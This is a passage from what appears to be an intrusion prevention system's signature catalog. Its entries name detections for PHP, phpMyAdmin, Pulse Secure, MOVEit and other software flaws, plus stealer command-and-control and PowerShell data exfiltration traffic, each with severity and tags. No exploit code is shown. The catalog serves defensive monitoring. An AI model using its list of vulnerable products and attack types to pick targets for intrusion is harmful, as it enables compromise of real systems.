HTTP_CSU-Php-Error-Loggin-Format-Strigs-Vuln-Strengur

About this situation: Php Error Logging Format String Vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Unix, Any Hardware, PHP, CVE2000, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-332-4219
Last changed: sgpkg-ips-332-4219
Vulnerability: HTTP-Php-Error-Logging-Format-Strigs-Vulnerability
Description:
Back to top

HTTP_CSU-PHP-FPM-Init_request_info-Path_Info-Buffer-Underflow

About this situation: An attempt to exploit a vulnerability in PHP detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1552-5242
Vulnerability: PHP-FPM-Init_request_info-Path_Info-Buffer-Underflow
Description:
Back to top

HTTP_CSU-Php-Function-Header-Injection

About this situation: An attempt to inject HTTP headers using PHP detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2002, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Php-Function-Header-Injection
Description:
Back to top

HTTP_CSU-Php-Fusion-Database-Backup-Disclosure

About this situation: Database backup file disclosure against PHP-Fusion
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, PHP-Fusion, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-1503-5242
Vulnerability: HTTP-Php-Fusion-Database-Backup-Disclosure
Description:
Back to top

HTTP_CSU-Php-Injection-Attack

About this situation: Detected a suspicious use of a external URI reference in a parameter to a PHP page
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-240-3038
Last changed: sgpkg-ips-272-4219
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Nuke-Admin-Styles-Phpbb-Root-Path-System-Compromise

About this situation: Detects PHP-Nuke admin_styles.php phpbb_root_path variable exploits
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, PHP-Nuke, CVE2006, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Php-Nuke-Admin-Styles-Phpbb-Root-Path-System-Compromise
Description:
Back to top

HTTP_CSU-Php-Nuke-SQL-Injection

About this situation: An attempt to exploit a vulnerability in PHP-Nuke detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP-Nuke, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Php-Nuke-SQL-Injection
Description:
Back to top

HTTP_CSU-Php-Phpinfo-request

About this situation: Call to PHP phpinfo.php detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-1665-5242
Vulnerability: Php-Phpinfo-request
Description:
Back to top

HTTP_CSU-Php-Phpinfo-XSS-Get

About this situation: Vulnerable call to PHP phpinfo()
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Vulnerability: HTTP-Php-Phpinfo-XSS
Description:
Back to top

HTTP_CSU-Php-Poison-Null-Byte-Strip-Tags-Bypass

About this situation: Detected an attempt to exploit a poison null byte vulnerability in PHP
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-401-4219
Vulnerability: HTTP_Php-Strip-Tags-Bypass-Vulnerability
Description:
Back to top

HTTP_CSU-PHP-Remote-File-Inclusion

About this situation: An attempt to exploit a remote file inclusion vulnerability detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1054-5242
Last changed: sgpkg-ips-1345-5242
Vulnerability: PHP-Remote-File-Inclusion
Description:
Back to top

HTTP_CSU-Php-Scripting-In-Client-Request

About this situation: Detected PHP scripting in the Client Request
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-1360-5242
Vulnerability: Web-Server-Side-Script-Disclosure
Description:
Back to top

HTTP_CSU-Php-Suspicious-Absolute-Path-Parameter

About this situation: Detected a suspicious use of a parameter in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-163-2032
Last changed: sgpkg-ips-163-2032
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Suspicious-Basedir-Parameter

About this situation: Detected a suspicious parameter use in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-199-2032
Last changed: sgpkg-ips-199-2032
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Suspicious-Document-Root-Parameter

About this situation: Detected a suspicious use of a DOCUMENT_ROOT parameter in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-272-4219
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Suspicious-External-Parameter-Reference

About this situation: Detected a suspicious use of a external URI reference in a parameter to a PHP page
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1345-5242
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Suspicious-Go-Parameter

About this situation: Detected a suspicious parameter use in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-404-4219
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Suspicious-Include-Parameter

About this situation: Detected a suspicious use of an include parameter in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-196-2032
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Suspicious-Path-Parameter

About this situation: Detected a suspicious use of an path parameter in URI
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1010-5242
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Suspicious-Root-Parameter

About this situation: Detected a suspicious parameter use in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-196-2032
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php-Suspicious-Site-Parameter

About this situation: Detected a suspicious parameter use in URI
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-196-2032
Vulnerability: Php-Suspicious-Include-Parameter
Description:
Back to top

HTTP_CSU-Php.cgi-Access

About this situation: php.cgi access
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, PHP, CVE1999, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: HTTP-Php-Cgi-BOF
Description:
Back to top

HTTP_CSU-Php.cgi-Possible-File-Disclosure

About this situation: php.cgi file disclosure
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, PHP, CVE1999, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: HTTP-Php-Cgi-File-Disclosure
Description:
Back to top

HTTP_CSU-Phpbb-Sessions-Php-Autologinid-Authentication-Bypass

About this situation: Attempt to bypass Phpbb authentication
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PhpBB, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-48-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Phpbb-Sessions-Php-Autologinid-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Phpgacl-Acl_Admin-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in phpGACL detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, phpGACL, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: Phpgacl-Acl_Admin-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Phpmyadmin-Code-Injection-Remote-Compromise

About this situation: An attempt to exploit a vulnerability in PhpMyAdmin
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, phpMyAdmin, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-333-4219
Last changed: sgpkg-ips-518-5211
Vulnerability: Phpmyadmin-Static-Code-Injection-Vulnerability-CVE-2009-1151
Description:
Back to top

HTTP_CSU-Phpmyadmin-Console-Access-Attempt

About this situation: Access to phpMyAdmin admin console login page detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, phpMyAdmin, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-533-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: Website-Admin-Console-Access
Description:
Back to top

HTTP_CSU-Phpmyadmin-Export-Php-Directory-Traversal

About this situation: Access to phpMyAdmin's export.php and directory traversal sequences detected
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, phpMyAdmin, CVE2004, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Phpmyadmin-Export-Php-Directory-Traversal
Description:
Back to top

HTTP_CSU-PHPUnit-Remote-Code-Execution-CVE-2017-9841

About this situation: An attempt to exploit a vulnerability in PHPUnit detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PHPUnit, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Vulnerability: PHPUnit-Remote-Code-Execution-CVE-2017-9841
Description:
Back to top

HTTP_CSU-Pimcore-Rest-API-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Pimcore web servies detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Pimcore, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1165-5242
Vulnerability: Pimcore-Rest-API-SQL-Injection
Description:
Back to top

HTTP_CSU-Pineapp-Mail-Secure-Ldapsyncnow-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in PineApp Mail-SeCure detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PineApp Mail-SeCure, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-537-5211
Last changed: sgpkg-ips-537-5211
Vulnerability: Pineapp-Mail-Secure-Ldapsyncnow-Remote-Command-Execution
Description:
Back to top

HTTP_CSU-Pinkslip-Bot-Traffic

About this situation: PinkSlip bot traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Pinkslip-Bot
Description:
Back to top

HTTP_CSU-Plex-Media-Server-Plugin-Unpickle-Dict-Windows-RCE

About this situation: An attempt to exploit a vulnerability in Plex Media Server plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Plex Media Server plugin, CVE2020, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Vulnerability: Plex-Media-Server-Plugin-Unpickle-Dict-Windows-RCE
Description:
Back to top

HTTP_CSU-Poison-Response-Splitting-Query

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation HTTP Server detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Tomcat, Apache2, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: HTTP-Response-Splitting-XSS
Description:
Back to top

HTTP_CSU-Ponmocup-Activity

About this situation: Ponmocup activity detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Ponmocup
Description:
Back to top

HTTP_CSU-Popper-Webmail-Remote-Code-Execution

About this situation: Popper Webmail remote code execution
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Popper Webmail, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Popper_Webmail_Remote_Code_Execution
Description:
Back to top

HTTP_CSU-Portalscan

About this situation: PortalScan traffic detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, PortalScan, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Portalscan
Description:
Back to top

HTTP_CSU-Possible-IIS-Upload-File-Exploit

About this situation: An attempt to exploit a vulnerability in IIS was detected
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, IIS, MS2002, Windows not specific, IIS not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: IIS-Upload-File-Exploit
Description:
Back to top

HTTP_CSU-Possible-Scan-For-Wordpress-RevSlider-Vulnerability

About this situation: Traffic that resembles a scan searching for a vulnerable WordPress plugin detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, WordPress RevSlider Plugin, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Vulnerability: Wordpress-RevSlider-Vulnerability
Description:
Back to top

HTTP_CSU-Possible-Shamoon-DistTrack-Data-Upload

About this situation: Possible Shamoon/DistTrack data upload
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: Shamoon-DistTrack-Malware
Description:
Back to top

HTTP_CSU-Possible-ShellCode-In-URI

About this situation: Detects various shellcode sequences in URI
Context: HTTP Request URI
Severity: 6
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, System Inspections, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-991-5242
Description:
Back to top

HTTP_CSU-Possible-Vice-Society-PowerShell-Data-Exfiltration-Traffic

About this situation: Possible Vice Society data exfiltration traffic pattern was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1579-5242
Last changed: sgpkg-ips-1579-5242
Vulnerability: Possible-Vice-Society-PowerShell-Data-Exfiltration-Traffic
Description:
Back to top

HTTP_CSU-Potential-Dot-Dot-Slash-Directory-Traversal

About this situation: Detects various encoded ../ traversals
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2018, CVE2024, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-182-2032
Last changed: sgpkg-ips-1645-5242
Vulnerability: Directory-Traversal
Laquis-Scada-Web-Server-Directory-Traversal
Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal
Description:
Back to top

HTTP_CSU-Potential-MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432

About this situation: An attempt to exploit a vulnerability in MinIO detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, MinIO, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432
Description:
Back to top

HTTP_CSU-Potential-System-File-Disclosure

About this situation: Detects attempts to access system files
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-1732-5242
Vulnerability: HTTP_System-File-Access
ACTi-ASOC-2200-Web-Configurator-Remote-Root-Command-Execution
Description:
Back to top

HTTP_CSU-Predator-The-Thief-C2-Traffic

About this situation: Predator The Thief C2 traffic was detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1130-5242
Last changed: sgpkg-ips-1130-5242
Vulnerability: Predator-The-Thief-C2-Traffic
Description:
Back to top

HTTP_CSU-Procurve-Manager-Snac-Getdomaincontrollerservlet-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in HP Identity Driven Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, HP Identity Driven Manager, HP ProCurve Manager, HP ProCurve Manager Plus, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Vulnerability: HP-Procurve-Manager-Snac-Getdomaincontrollerservlet-Policy-Bypass
Description:
Back to top

HTTP_CSU-Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Progress Software MOVEit Transfer detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, MOVEit, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1611-5242
Last changed: sgpkg-ips-1611-5242
Vulnerability: Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection
Description:
Back to top

HTTP_CSU-Progress-Telerik-Report-Server-Authentication-Bypass-CVE-2024-4358

About this situation: An attempt to exploit a vulnerability in Progress Telerik Report Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Progress Telerik Report Server, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1733-5242
Vulnerability: Progress-Telerik-Report-Server-Authentication-Bypass-CVE-2024-4358
Description: CVE References: CVE-2024-4358
Back to top

HTTP_CSU-Progress-WhatsUp-Gold-Testcontroller-Information-Disclosure-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Progress Software WhatsUp Gold detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Progress WhatsUp Gold, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Progress-WhatsUp-Gold-Testcontroller-Information-Disclosure-Vulnerabilities
Description:
Back to top

HTTP_CSU-PROMOTIC-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in PROMOTIC detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PROMOTIC, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: PROMOTIC-Directory-Traversal
Description:
Back to top

HTTP_CSU-PRTG-Network-Monitor-Local-File-Inclusion-CVE-2018-19410

About this situation: An attempt to exploit a vulnerability in PRTG Network Monitor detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, PRTG Network Monitor, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Vulnerability: PRTG-Network-Monitor-Local-File-Inclusion-CVE-2018-19410
Description:
Back to top

HTTP_CSU-Pulse-Connect-Secure-Remote-Code-Execution-CVE-2021-22893

About this situation: An attempt to exploit a vulnerability in Pulse Connect Secure detected
Context: HTTP Request URI
Severity: 7
Tags: Pulse Secure, Any Hardware, CVE2021, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Pulse-Connect-Secure-Remote-Code-Execution-CVE-2021-22893
Description:
Back to top

HTTP_CSU-Pulse-Secure-SSL-VPN-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Pulse Secure SSL VPN detected
Context: HTTP Request URI
Severity: 7
Tags: Pulse Secure, Any Hardware, CVE2019, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1188-5242
Vulnerability: Pulse-Secure-SSL-VPN-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading

About this situation: An attempt to exploit a vulnerability in Pulse Secure SSL VPN detected
Context: HTTP Request URI
Severity: 10
Tags: Pulse Secure, Any Hardware, CVE2019, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1188-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading
Description:
Back to top

HTTP_CSU-Pulse-Secure-VPN-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in Pulse Secure VPN detected
Context: HTTP Request URI
Severity: 7
Tags: Unix, Linux, Any Hardware, Pulse Secure VPN, CVE2019, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1203-5242
Last changed: sgpkg-ips-1203-5242
Vulnerability: Pulse-Secure-VPN-Arbitrary-Command-Execution
Description:
Back to top

HTTP_CSU-Pushdo-Spambot

About this situation: Pushdo spambot command and control channel communication detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Pushdo spambot, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-269-3038
Vulnerability: Pushdo-Spambot
Description:
Back to top

HTTP_CSU-Py-Software-Active-Webcam-Webserver-Floppy-DoS

About this situation: Py Software's Active Webcam Webserver denial of service vulnerability
Context: HTTP Request URI
Severity: 2
